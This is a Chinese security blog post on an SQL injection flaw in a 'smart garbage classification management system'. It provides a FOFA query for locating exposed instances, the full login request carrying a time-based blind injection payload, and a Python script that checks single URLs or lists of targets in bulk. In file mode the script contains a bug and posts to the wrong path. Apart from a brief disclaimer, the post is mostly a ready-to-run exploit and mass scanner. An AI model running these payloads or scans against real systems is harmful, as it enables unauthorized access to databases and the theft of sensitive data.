cat-nineteen
0%

SQL注入-智能垃圾分类管理系统

发表于 更新于 分类于

漏洞描述

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

智慧垃圾分类管理系统应用于智能垃圾桶、厨余垃圾桶、智能果皮箱生产的企业,依托AI技术、人脸识别、移动互联网、大数据、物联网等。该系统存在sql注入漏洞,攻击者可获取数据库敏感信息。

影响版本

全版本?

FOFA语句

1
title="智能垃圾分类管理系统"

image-20211030173323420

环境搭建

漏洞复现

在登录页面使用burp抓取页面流量;

image-20211101090915969

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /ghc_master/data/action.admindata.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 96
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.62
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

do=adminlogin&username=admin' AND (SELECT 2847 FROM (SELECT(SLEEP(5)))trlL)-- sNmL&password=4224

image-20211030173422648

如果在5秒后返回了1,说明存在sql注入漏洞;

批量POC

以下python脚本,可批量进行检测;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
# encoding: utf-8
import requests
import sys
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning  #消除警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 消除警告

def longer():
    print('+++FOFA:title="智能垃圾分类管理系统"')
    print('+++python xxx.py -u/--url http://xxx.xxx.xxx.xxx')
    print('+++python xxx.py -f/--file xxx.txt')
    print('+++作者:longer')
    print('-----------------------------------------------------')
if len(sys.argv) == 1:
    longer()
    sys.exit()
p = argparse.ArgumentParser(description='longer')
p.add_argument('-u','--url',help='目标url',default='')
p.add_argument('-f','--file',help='文件',default='')
xp = p.parse_args()
url = xp.url
file = xp.file

data = "do=adminlogin&username=admin' AND (SELECT 2847 FROM (SELECT(SLEEP(5)))trlL)-- sNmL&password=4224"
headers = {
    'User-Agent': 'Mozilla/5.0(Windows NT 10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/90.0.4430.212Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
    'Cookie': 'PHPSESSID=hfq66id9bum90sovr9gmn7klde'
}

if url !='':
    url1 = url
    try:
        url = url+'/ghc_master/data/action.admindata.php'
        r = requests.post(url = url ,headers =headers,data=data ,timeout = 15,verify=False)
        if r.text =='1' and r.status_code == 200:
            print(url1 + '存在sql注入')
        else:
            print(url1+'不存在sql注入')
    except:
        print(url1+"异常")
if file!= '':
    f = open(file,'r+')
    for i in f.readlines():
        url=i.strip()
        if url.startswith('http:') != 1 and url.startswith('https:') != 1:
            url = 'http://' + url
        url =url
        url1 = url
        try:
            t = url + '/ghc_master/data/action.admindata.php'
            r =requests.post(url=url,data=data,headers=headers,timeout=15,verify=False)
            if r.status_code == 200 and '1' in r.text:
                print(url1+'存在sql注入')
            else:
                print(url1+'不存在注入')
        except:
            print(url1+'异常')

欢迎关注我的其它发布渠道